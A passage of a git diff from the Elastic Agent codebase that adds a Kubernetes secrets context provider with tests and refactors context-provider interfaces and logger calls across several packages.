map[string]interface{}{ + "key1": "dynamic1", + "list": []string{ + "array1", + "array2", + }, + "dict": map[string]string{ + "key1": "value1", + "key2": "value2", + }, + }, + }, + "dynamic", + processers, + fetchContextProviders) + require.NoError(t, err) + + res, err := vars.Replace("${testing.key1}") + require.NoError(t, err) + assert.Equal(t, NewStrVal("data1"), res) + + res, err = vars.Replace("${dynamic.key1}") + require.NoError(t, err) + assert.Equal(t, NewStrValWithProcessors("dynamic1", processers), res) + + res, err = vars.Replace("${other.key1|dynamic.key1}") + require.NoError(t, err) + assert.Equal(t, NewStrValWithProcessors("dynamic1", processers), res) + + res, err = vars.Replace("${dynamic.list}") + require.NoError(t, err) + assert.Equal(t, processers, res.Processors()) + assert.Equal(t, NewListWithProcessors([]Node{ + NewStrVal("array1"), + NewStrVal("array2"), + }, processers), res) + + res, err = vars.Replace("${dynamic.dict}") + require.NoError(t, err) + assert.Equal(t, processers, res.Processors()) + assert.Equal(t, NewDictWithProcessors([]Node{ + NewKey("key1", NewStrVal("value1")), + NewKey("key2", NewStrVal("value2")), + }, processers), res) + + res, err = vars.Replace("${kubernetes_secrets.test_namespace.testing_secret.secret_value}") + require.NoError(t, err) + assert.Equal(t, NewStrVal("mockedFetchContent"), res) +} + +type contextProviderMock struct { +} + +// MockContextProviderBuilder builds the mock context provider. +func MockContextProviderBuilder() (corecomp.ContextProvider, error) { + return &contextProviderMock{}, nil +} + +func (p *contextProviderMock) Fetch(key string) (string, bool) { + return "mockedFetchContent", true +} + +func (p *contextProviderMock) Run(comm corecomp.ContextProviderComm) error { + return nil +} diff --git a/x-pack/elastic-agent/pkg/artifact/download/composed/downloader_test.go b/x-pack/elastic-agent/pkg/artifact/download/composed/downloader_test.go index 81e9af137dc..faf0f2f26b9 100644 --- a/x-pack/elastic-agent/pkg/artifact/download/composed/downloader_test.go +++ b/x-pack/elastic-agent/pkg/artifact/download/composed/downloader_test.go @@ -38,19 +38,19 @@ func (d *SuccDownloader) Called() bool { return d.called } func TestComposed(t *testing.T) { testCases := []testCase{ - testCase{ + { downloaders: []CheckableDownloader{&FailingDownloader{}, &SuccDownloader{}}, checkFunc: func(d []CheckableDownloader) bool { return d[0].Called() && d[1].Called() }, expectedResult: true, - }, testCase{ + }, { downloaders: []CheckableDownloader{&SuccDownloader{}, &SuccDownloader{}}, checkFunc: func(d []CheckableDownloader) bool { return d[0].Called() && !d[1].Called() }, expectedResult: true, - }, testCase{ + }, { downloaders: []CheckableDownloader{&SuccDownloader{}, &FailingDownloader{}}, checkFunc: func(d []CheckableDownloader) bool { return d[0].Called() && !d[1].Called() }, expectedResult: true, - }, testCase{ + }, { downloaders: []CheckableDownloader{&FailingDownloader{}, &FailingDownloader{}}, checkFunc: func(d []CheckableDownloader) bool { return d[0].Called() && d[1].Called() }, expectedResult: false, @@ -59,7 +59,7 @@ func TestComposed(t *testing.T) { for _, tc := range testCases { d := NewDownloader(tc.downloaders[0], tc.downloaders[1]) - r, _ := d.Download(nil, program.Spec{Name: "a", Cmd: "a", Artifact: "a/a"}, "b") + r, _ := d.Download(context.TODO(), program.Spec{Name: "a", Cmd: "a", Artifact: "a/a"}, "b") assert.Equal(t, tc.expectedResult, r == "succ") diff --git a/x-pack/elastic-agent/pkg/artifact/download/fs/verifier_test.go b/x-pack/elastic-agent/pkg/artifact/download/fs/verifier_test.go index 38d17dadf4c..8abea0e59f0 100644 --- a/x-pack/elastic-agent/pkg/artifact/download/fs/verifier_test.go +++ b/x-pack/elastic-agent/pkg/artifact/download/fs/verifier_test.go @@ -28,11 +28,6 @@ var ( beatSpec = program.Spec{Name: "Filebeat", Cmd: "filebeat", Artifact: "beat/filebeat"} ) -type testCase struct { - system string - arch string -} - func TestFetchVerify(t *testing.T) { timeout := 15 * time.Second dropPath := filepath.Join("testdata", "drop") diff --git a/x-pack/elastic-agent/pkg/artifact/download/http/downloader_test.go b/x-pack/elastic-agent/pkg/artifact/download/http/downloader_test.go index 4c6c79997cb..1db7f9e40cc 100644 --- a/x-pack/elastic-agent/pkg/artifact/download/http/downloader_test.go +++ b/x-pack/elastic-agent/pkg/artifact/download/http/downloader_test.go @@ -21,8 +21,7 @@ func TestDownloadBodyError(t *testing.T) { // part way through the download, while copying the response body. type connKey struct{} - var srv *httptest.Server - srv = httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) w.(http.Flusher).Flush() conn := r.Context().Value(connKey{}).(net.Conn) diff --git a/x-pack/elastic-agent/pkg/artifact/install/zip/zip_installer.go b/x-pack/elastic-agent/pkg/artifact/install/zip/zip_installer.go index eba432feefb..625d90b2b20 100644 --- a/x-pack/elastic-agent/pkg/artifact/install/zip/zip_installer.go +++ b/x-pack/elastic-agent/pkg/artifact/install/zip/zip_installer.go @@ -18,11 +18,6 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/artifact" ) -const ( - // powershellCmdTemplate uses elevated execution policy to avoid failure in case script execution is disabled on the system - powershellCmdTemplate = `set-executionpolicy unrestricted; cd %s; .\install-service-%s.ps1` -) - // Installer or zip packages type Installer struct { config *artifact.Config diff --git a/x-pack/elastic-agent/pkg/basecmd/version/cmd_test.go b/x-pack/elastic-agent/pkg/basecmd/version/cmd_test.go index 2694ed1cd3f..81fb5a56d8f 100644 --- a/x-pack/elastic-agent/pkg/basecmd/version/cmd_test.go +++ b/x-pack/elastic-agent/pkg/basecmd/version/cmd_test.go @@ -128,7 +128,7 @@ func newErrorLogger(t *testing.T) *logger.Logger { loggerCfg := logger.DefaultLoggingConfig() loggerCfg.Level = logp.ErrorLevel - log, err := logger.NewFromConfig("", loggerCfg) + log, err := logger.NewFromConfig("", loggerCfg, false) require.NoError(t, err) return log } diff --git a/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go b/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go index 46107463151..ca84aad0c21 100644 --- a/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go +++ b/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go @@ -29,7 +29,7 @@ func TestLoadCapabilities(t *testing.T) { "no_caps", } - l, _ := logger.New("test") + l, _ := logger.New("test", false) for _, tc := range testCases { t.Run(tc, func(t *testing.T) { @@ -57,6 +57,8 @@ func TestLoadCapabilities(t *testing.T) { defer resultCloser.Close() expectedMap, err := expectedConfig.ToMapStr() + assert.NoError(t, err) + fixInputsType(expectedMap) fixInputsType(resultConfig) @@ -76,7 +78,7 @@ func TestInvalidLoadCapabilities(t *testing.T) { "invalid_output", } - l, _ := logger.New("test") + l, _ := logger.New("test", false) for _, tc := range testCases { t.Run(tc, func(t *testing.T) { @@ -340,7 +342,7 @@ func newErrorLogger(t *testing.T) *logger.Logger { loggerCfg := logger.DefaultLoggingConfig() loggerCfg.Level = logp.ErrorLevel - log, err := logger.NewFromConfig("", loggerCfg) + log, err := logger.NewFromConfig("", loggerCfg, false) require.NoError(t, err) return log } diff --git a/x-pack/elastic-agent/pkg/capabilities/input_test.go b/x-pack/elastic-agent/pkg/capabilities/input_test.go index 7a2707d8f83..dd92f360c8a 100644 --- a/x-pack/elastic-agent/pkg/capabilities/input_test.go +++ b/x-pack/elastic-agent/pkg/capabilities/input_test.go @@ -19,7 +19,7 @@ import ( func TestMultiInput(t *testing.T) { tr := &testReporter{} - l, _ := logger.New("test") + l, _ := logger.New("test", false) t.Run("no match", func(t *testing.T) { rd := &ruleDefinitions{ @@ -184,7 +184,7 @@ func TestMultiInput(t *testing.T) { } func TestInput(t *testing.T) { - l, _ := logger.New("test") + l, _ := logger.New("test", false) tr := &testReporter{} t.Run("invalid rule", func(t *testing.T) { r := &upgradeCapability{} diff --git a/x-pack/elastic-agent/pkg/capabilities/output_test.go b/x-pack/elastic-agent/pkg/capabilities/output_test.go index fca32effadc..62553cf026c 100644 --- a/x-pack/elastic-agent/pkg/capabilities/output_test.go +++ b/x-pack/elastic-agent/pkg/capabilities/output_test.go @@ -17,7 +17,7 @@ import ( func TestMultiOutput(t *testing.T) { tr := &testReporter{} - l, _ := logger.New("test") + l, _ := logger.New("test", false) t.Run("no match", func(t *testing.T) { rd := &ruleDefinitions{ Capabilities: []ruler{&outputCapability{ @@ -167,7 +167,7 @@ func TestMultiOutput(t *testing.T) { func TestOutput(t *testing.T) { tr := &testReporter{} - l, _ := logger.New("test") + l, _ := logger.New("test", false) t.Run("invalid rule", func(t *testing.T) { r := &upgradeCapability{} cap, err := newOutputCapability(l, r, tr) diff --git a/x-pack/elastic-agent/pkg/capabilities/rule_test.go b/x-pack/elastic-agent/pkg/capabilities/rule_test.go index 5f3bab860bf..c6e367fc517 100644 --- a/x-pack/elastic-agent/pkg/capabilities/rule_test.go +++ b/x-pack/elastic-agent/pkg/capabilities/rule_test.go @@ -15,7 +15,7 @@ import ( func TestUnmarshal(t *testing.T) { t.Run("valid json", func(t *testing.T) { - rr := &ruleDefinitions{Capabilities: make([]ruler, 0, 0)} + rr := &ruleDefinitions{Capabilities: make([]ruler, 0)} err := json.Unmarshal(jsonDefinitionValid, &rr) @@ -35,7 +35,7 @@ func TestUnmarshal(t *testing.T) { }) t.Run("valid yaml", func(t *testing.T) { - rr := &ruleDefinitions{Capabilities: make([]ruler, 0, 0)} + rr := &ruleDefinitions{Capabilities: make([]ruler, 0)} err := yaml.Unmarshal(yamlDefinitionValid, &rr) diff --git a/x-pack/elastic-agent/pkg/capabilities/upgrade_test.go b/x-pack/elastic-agent/pkg/capabilities/upgrade_test.go index 0dc82ed3507..64b36afad83 100644 --- a/x-pack/elastic-agent/pkg/capabilities/upgrade_test.go +++ b/x-pack/elastic-agent/pkg/capabilities/upgrade_test.go @@ -15,7 +15,7 @@ import ( func TestUpgrade(t *testing.T) { tr := &testReporter{} - l, _ := logger.New("test") + l, _ := logger.New("test", false) t.Run("invalid rule", func(t *testing.T) { r := &inputCapability{} cap, err := newUpgradeCapability(l, r, tr) diff --git a/x-pack/elastic-agent/pkg/composable/context.go b/x-pack/elastic-agent/pkg/composable/context.go index f77033d1d6d..c5f1d187d42 100644 --- a/x-pack/elastic-agent/pkg/composable/context.go +++ b/x-pack/elastic-agent/pkg/composable/context.go @@ -5,30 +5,16 @@ package composable import ( - "context" "fmt" "strings" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) -// ContextProviderComm is the interface that a context provider uses to communicate back to Elastic Agent. -type ContextProviderComm interface { - context.Context - - // Set sets the current mapping for this context. - Set(map[string]interface{}) error -} - -// ContextProvider is the interface that a context provider must implement. -type ContextProvider interface { - // Run runs the context provider. - Run(ContextProviderComm) error -} - // ContextProviderBuilder creates a new context provider based on the given config and returns it. -type ContextProviderBuilder func(log *logger.Logger, config *config.Config) (ContextProvider, error) +type ContextProviderBuilder func(log *logger.Logger, config *config.Config) (corecomp.ContextProvider, error) // AddContextProvider adds a new ContextProviderBuilder func (r *providerRegistry) AddContextProvider(name string, builder ContextProviderBuilder) error { diff --git a/x-pack/elastic-agent/pkg/composable/controller.go b/x-pack/elastic-agent/pkg/composable/controller.go index cb629f4c7e9..8818e0752bd 100644 --- a/x-pack/elastic-agent/pkg/composable/controller.go +++ b/x-pack/elastic-agent/pkg/composable/controller.go @@ -8,16 +8,18 @@ import ( "context" "encoding/json" "fmt" - "strings" - "reflect" "sort" + "strings" "sync" "time" + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) @@ -98,6 +100,8 @@ func (c *controller) Run(ctx context.Context, cb VarsCallback) error { notify := make(chan bool, 5000) localCtx, cancel := context.WithCancel(ctx) + fetchContextProviders := common.MapStr{} + // run all the enabled context providers for name, state := range c.contextProviders { state.Context = localCtx @@ -107,6 +111,9 @@ func (c *controller) Run(ctx context.Context, cb VarsCallback) error { cancel() return errors.New(err, fmt.Sprintf("failed to run provider '%s'", name), errors.TypeConfig, errors.M("provider", name)) } + if p, ok := state.provider.(corecomp.FetchContextProvider); ok { + fetchContextProviders.Put(name, p) + } } // run all the enabled dynamic providers @@ -151,7 +158,7 @@ func (c *controller) Run(ctx context.Context, cb VarsCallback) error { mapping[name] = state.Current() } // this is ensured not to error, by how the mappings states are verified - vars[0], _ = transpiler.NewVars(mapping) + vars[0], _ = transpiler.NewVars(mapping, fetchContextProviders) // add to the vars list for each dynamic providers mappings for name, state := range c.dynamicProviders { @@ -159,7 +166,7 @@ func (c *controller) Run(ctx context.Context, cb VarsCallback) error { local, _ := cloneMap(mapping) // will not fail; already been successfully cloned once local[name] = mappings.mapping // this is ensured not to error, by how the mappings states are verified - v, _ := transpiler.NewVarsWithProcessors(local, name, mappings.processors) + v, _ := transpiler.NewVarsWithProcessors(local, name, mappings.processors, fetchContextProviders) vars = append(vars, v) } } @@ -175,7 +182,7 @@ func (c *controller) Run(ctx context.Context, cb VarsCallback) error { type contextProviderState struct { context.Context - provider ContextProvider + provider corecomp.ContextProvider lock sync.RWMutex mapping map[string]interface{} signal chan bool @@ -189,7 +196,7 @@ func (c *contextProviderState) Set(mapping map[string]interface{}) error { return err } // ensure creating vars will not error - _, err = transpiler.NewVars(mapping) + _, err = transpiler.NewVars(mapping, nil) if err != nil { return err } @@ -244,7 +251,7 @@ func (c *dynamicProviderState) AddOrUpdate(id string, priority int, mapping map[ return err } // ensure creating vars will not error - _, err = transpiler.NewVars(mapping) + _, err = transpiler.NewVars(mapping, nil) if err != nil { return err } diff --git a/x-pack/elastic-agent/pkg/composable/controller_test.go b/x-pack/elastic-agent/pkg/composable/controller_test.go index da05a41bfd3..c910a905d5e 100644 --- a/x-pack/elastic-agent/pkg/composable/controller_test.go +++ b/x-pack/elastic-agent/pkg/composable/controller_test.go @@ -75,7 +75,7 @@ func TestController(t *testing.T) { }) require.NoError(t, err) - log, err := logger.New("") + log, err := logger.New("", false) require.NoError(t, err) c, err := composable.New(log, cfg) require.NoError(t, err) diff --git a/x-pack/elastic-agent/pkg/composable/providers/agent/agent.go b/x-pack/elastic-agent/pkg/composable/providers/agent/agent.go index c6f1a91e321..efba2598ad0 100644 --- a/x-pack/elastic-agent/pkg/composable/providers/agent/agent.go +++ b/x-pack/elastic-agent/pkg/composable/providers/agent/agent.go @@ -9,6 +9,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) @@ -20,7 +21,7 @@ func init() { type contextProvider struct{} // Run runs the Agent context provider. -func (*contextProvider) Run(comm composable.ContextProviderComm) error { +func (*contextProvider) Run(comm corecomp.ContextProviderComm) error { a, err := info.NewAgentInfo() if err != nil { return err @@ -41,6 +42,6 @@ func (*contextProvider) Run(comm composable.ContextProviderComm) error { } // ContextProviderBuilder builds the context provider. -func ContextProviderBuilder(_ *logger.Logger, _ *config.Config) (composable.ContextProvider, error) { +func ContextProviderBuilder(_ *logger.Logger, _ *config.Config) (corecomp.ContextProvider, error) { return &contextProvider{}, nil } diff --git a/x-pack/elastic-agent/pkg/composable/providers/docker/docker.go b/x-pack/elastic-agent/pkg/composable/providers/docker/docker.go index 902ceb7c832..ad49bac6288 100644 --- a/x-pack/elastic-agent/pkg/composable/providers/docker/docker.go +++ b/x-pack/elastic-agent/pkg/composable/providers/docker/docker.go @@ -91,9 +91,7 @@ func (c *dynamicProvider) Run(comm composable.DynamicProviderComm) error { }) stoppers[data.container.ID] = stopper case data := <-stopTrigger: - if _, ok := stoppers[data.container.ID]; ok { - delete(stoppers, data.container.ID) - } + delete(stoppers, data.container.ID) comm.Remove(data.container.ID) } } diff --git a/x-pack/elastic-agent/pkg/composable/providers/env/env.go b/x-pack/elastic-agent/pkg/composable/providers/env/env.go index 1eefb7c2ff3..e068aa7a14e 100644 --- a/x-pack/elastic-agent/pkg/composable/providers/env/env.go +++ b/x-pack/elastic-agent/pkg/composable/providers/env/env.go @@ -11,6 +11,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) @@ -21,7 +22,7 @@ func init() { type contextProvider struct{} // Run runs the environment context provider. -func (*contextProvider) Run(comm composable.ContextProviderComm) error { +func (*contextProvider) Run(comm corecomp.ContextProviderComm) error { err := comm.Set(getEnvMapping()) if err != nil { return errors.New(err, "failed to set mapping", errors.TypeUnexpected) @@ -30,7 +31,7 @@ func (*contextProvider) Run(comm composable.ContextProviderComm) error { } // ContextProviderBuilder builds the context provider. -func ContextProviderBuilder(_ *logger.Logger, _ *config.Config) (composable.ContextProvider, error) { +func ContextProviderBuilder(_ *logger.Logger, _ *config.Config) (corecomp.ContextProvider, error) { return &contextProvider{}, nil } diff --git a/x-pack/elastic-agent/pkg/composable/providers/host/host.go b/x-pack/elastic-agent/pkg/composable/providers/host/host.go index b8971adb477..3bced796ac2 100644 --- a/x-pack/elastic-agent/pkg/composable/providers/host/host.go +++ b/x-pack/elastic-agent/pkg/composable/providers/host/host.go @@ -16,6 +16,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) @@ -38,7 +39,7 @@ type contextProvider struct { } // Run runs the environment context provider. -func (c *contextProvider) Run(comm composable.ContextProviderComm) error { +func (c *contextProvider) Run(comm corecomp.ContextProviderComm) error { current, err := c.fetcher() if err != nil { return err @@ -79,7 +80,7 @@ func (c *contextProvider) Run(comm composable.ContextProviderComm) error { } // ContextProviderBuilder builds the context provider. -func ContextProviderBuilder(log *logger.Logger, c *config.Config) (composable.ContextProvider, error) { +func ContextProviderBuilder(log *logger.Logger, c *config.Config) (corecomp.ContextProvider, error) { p := &contextProvider{ logger: log, fetcher: getHostInfo, diff --git a/x-pack/elastic-agent/pkg/composable/providers/host/host_test.go b/x-pack/elastic-agent/pkg/composable/providers/host/host_test.go index c2e467c5b04..c6c758a25c3 100644 --- a/x-pack/elastic-agent/pkg/composable/providers/host/host_test.go +++ b/x-pack/elastic-agent/pkg/composable/providers/host/host_test.go @@ -31,7 +31,7 @@ func TestContextProvider(t *testing.T) { }) require.NoError(t, err) builder, _ := composable.Providers.GetContextProvider("host") - log, err := logger.New("host_test") + log, err := logger.New("host_test", false) require.NoError(t, err) provider, err := builder(log, c) require.NoError(t, err) diff --git a/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/config.go b/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/config.go new file mode 100644 index 00000000000..29463db148a --- /dev/null +++ b/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/config.go @@ -0,0 +1,13 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +// TODO review the need for this +// +build linux darwin windows + +package kubernetessecrets + +// Config for kubernetes provider +type Config struct { + KubeConfig string `config:"kube_config"` +} diff --git a/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/kubernetes_secrets.go b/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/kubernetes_secrets.go new file mode 100644 index 00000000000..4af00bc766e --- /dev/null +++ b/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/kubernetes_secrets.go @@ -0,0 +1,94 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package kubernetessecrets + +import ( + "context" + "strings" + + metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" + k8sclient "k8s.io/client-go/kubernetes" + + "github.com/elastic/beats/v7/libbeat/common/kubernetes" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" +) + +var _ corecomp.FetchContextProvider = (*contextProviderK8sSecrets)(nil) +var getK8sClientFunc = getK8sClient + +func init() { + composable.Providers.AddContextProvider("kubernetes_secrets", ContextProviderBuilder) +} + +type contextProviderK8sSecrets struct { + logger *logger.Logger + config *Config + client k8sclient.Interface +} + +// ContextProviderBuilder builds the context provider. +func ContextProviderBuilder(logger *logger.Logger, c *config.Config) (corecomp.ContextProvider, error) { + var cfg Config + if c == nil { + c = config.New() + } + err := c.Unpack(&cfg) + if err != nil { + return nil, errors.New(err, "failed to unpack configuration") + } + return &contextProviderK8sSecrets{logger, &cfg, nil}, nil +} + +func (p *contextProviderK8sSecrets) Fetch(key string) (string, bool) { + // key = "kubernetes_secrets.somenamespace.somesecret.value" + tokens := strings.Split(key, ".") + if len(tokens) > 0 && tokens[0] != "kubernetes_secrets" { + return "", false + } + if len(tokens) != 4 { + p.logger.Debugf( + "not valid secret key: %v. Secrets should be of the following format %v", + key, + "kubernetes_secrets.somenamespace.somesecret.value", + ) + return "", false + } + ns := tokens[1] + secretName := tokens[2] + secretVar := tokens[3] + + secretIntefrace := p.client.CoreV1().Secrets(ns) + ctx := context.TODO() + secret, err := secretIntefrace.Get(ctx, secretName, metav1.GetOptions{}) + if err != nil { + p.logger.Errorf("Could not retrieve secret from k8s API: %v", err) + return "", false + } + if _, ok := secret.Data[secretVar]; !ok { + p.logger.Errorf("Could not retrieve value %v for secret %v", secretVar, secretName) + return "", false + } + secretString := secret.Data[secretVar] + return string(secretString), true +} + +// Run initializes the k8s secrets context provider. +func (p *contextProviderK8sSecrets) Run(comm corecomp.ContextProviderComm) error { + client, err := getK8sClientFunc(p.config.KubeConfig) + if err != nil { + p.logger.Debugf("Kubernetes_secrets provider skipped, unable to connect: %s", err) + return nil + } + p.client = client + return nil +} + +func getK8sClient(kubeconfig string) (k8sclient.Interface, error) { + return kubernetes.GetKubernetesClient(kubeconfig) +} diff --git a/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/kubernetes_secrets_test.go b/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/kubernetes_secrets_test.go new file mode 100644 index 00000000000..66943300427 --- /dev/null +++ b/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/kubernetes_secrets_test.go @@ -0,0 +1,100 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package kubernetessecrets + +import ( + "context" + "testing" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + v1 "k8s.io/api/core/v1" + metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" + k8sclient "k8s.io/client-go/kubernetes" + k8sfake "k8s.io/client-go/kubernetes/fake" + + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" +) + +func Test_K8sSecretsProvider_Fetch(t *testing.T) { + client := k8sfake.NewSimpleClientset() + ns := "test_namespace" + pass := "testing_passpass" + secret := &v1.Secret{ + TypeMeta: metav1.TypeMeta{ + Kind: "Secret", + APIVersion: "apps/v1beta1", + }, + ObjectMeta: metav1.ObjectMeta{ + Name: "testing_secret", + Namespace: ns, + }, + Data: map[string][]byte{ + "secret_value": []byte(pass), + }, + } + _, err := client.CoreV1().Secrets(ns).Create(context.Background(), secret, metav1.CreateOptions{}) + require.NoError(t, err) + + logger := logp.NewLogger("test_k8s_secrets") + cfg, err := config.NewConfigFrom(map[string]string{"a": "b"}) + require.NoError(t, err) + + p, err := ContextProviderBuilder(logger, cfg) + require.NoError(t, err) + + fp := p.(corecomp.FetchContextProvider) + + getK8sClientFunc = func(kubeconfig string) (k8sclient.Interface, error) { + return client, nil + } + require.NoError(t, err) + fp.Run(nil) + val, found := fp.Fetch("kubernetes_secrets.test_namespace.testing_secret.secret_value") + assert.True(t, found) + assert.Equal(t, val, pass) +} + +func Test_K8sSecretsProvider_FetchWrongSecret(t *testing.T) { + client := k8sfake.NewSimpleClientset() + ns := "test_namespace" + pass := "testing_passpass" + secret := &v1.Secret{ + TypeMeta: metav1.TypeMeta{ + Kind: "Secret", + APIVersion: "apps/v1beta1", + }, + ObjectMeta: metav1.ObjectMeta{ + Name: "testing_secret", + Namespace: ns, + }, + Data: map[string][]byte{ + "secret_value": []byte(pass), + }, + } + _, err := client.CoreV1().Secrets(ns).Create(context.Background(), secret, metav1.CreateOptions{}) + require.NoError(t, err) + + logger := logp.NewLogger("test_k8s_secrets") + cfg, err := config.NewConfigFrom(map[string]string{"a": "b"}) + require.NoError(t, err) + + p, err := ContextProviderBuilder(logger, cfg) + require.NoError(t, err) + + fp := p.(corecomp.FetchContextProvider) + + getK8sClientFunc = func(kubeconfig string) (k8sclient.Interface, error) { + return client, nil + } + require.NoError(t, err) + fp.Run(nil) + val, found := fp.Fetch("kubernetes_secrets.test_namespace.testing_secretHACK.secret_value") + assert.False(t, found) + assert.EqualValues(t, val, "") +} diff --git a/x-pack/elastic-agent/pkg/composable/providers/local/local.go b/x-pack/elastic-agent/pkg/composable/providers/local/local.go index 62fd2b65480..45a9f71f89a 100644 --- a/x-pack/elastic-agent/pkg/composable/providers/local/local.go +++ b/x-pack/elastic-agent/pkg/composable/providers/local/local.go @@ -10,6 +10,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) @@ -22,7 +23,7 @@ type contextProvider struct { } // Run runs the environment context provider. -func (c *contextProvider) Run(comm composable.ContextProviderComm) error { +func (c *contextProvider) Run(comm corecomp.ContextProviderComm) error { err := comm.Set(c.Mapping) if err != nil { return errors.New(err, "failed to set mapping", errors.TypeUnexpected) @@ -31,7 +32,7 @@ func (c *contextProvider) Run(comm composable.ContextProviderComm) error { } // ContextProviderBuilder builds the context provider. -func ContextProviderBuilder(_ *logger.Logger, c *config.Config) (composable.ContextProvider, error) { +func ContextProviderBuilder(_ *logger.Logger, c *config.Config) (corecomp.ContextProvider, error) { p := &contextProvider{} if c != nil { err := c.Unpack(p) diff --git a/x-pack/elastic-agent/pkg/composable/providers/path/path.go b/x-pack/elastic-agent/pkg/composable/providers/path/path.go index 04e80a9ef41..990e1ecfbd2 100644 --- a/x-pack/elastic-agent/pkg/composable/providers/path/path.go +++ b/x-pack/elastic-agent/pkg/composable/providers/path/path.go @@ -9,6 +9,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) @@ -19,7 +20,7 @@ func init() { type contextProvider struct{} // Run runs the Agent context provider. -func (*contextProvider) Run(comm composable.ContextProviderComm) error { +func (*contextProvider) Run(comm corecomp.ContextProviderComm) error { err := comm.Set(map[string]interface{}{ "home": paths.Home(), "data": paths.Data(), @@ -33,6 +34,6 @@ func (*contextProvider) Run(comm composable.ContextProviderComm) error { } // ContextProviderBuilder builds the context provider. -func ContextProviderBuilder(_ *logger.Logger, _ *config.Config) (composable.ContextProvider, error) { +func ContextProviderBuilder(_ *logger.Logger, _ *config.Config) 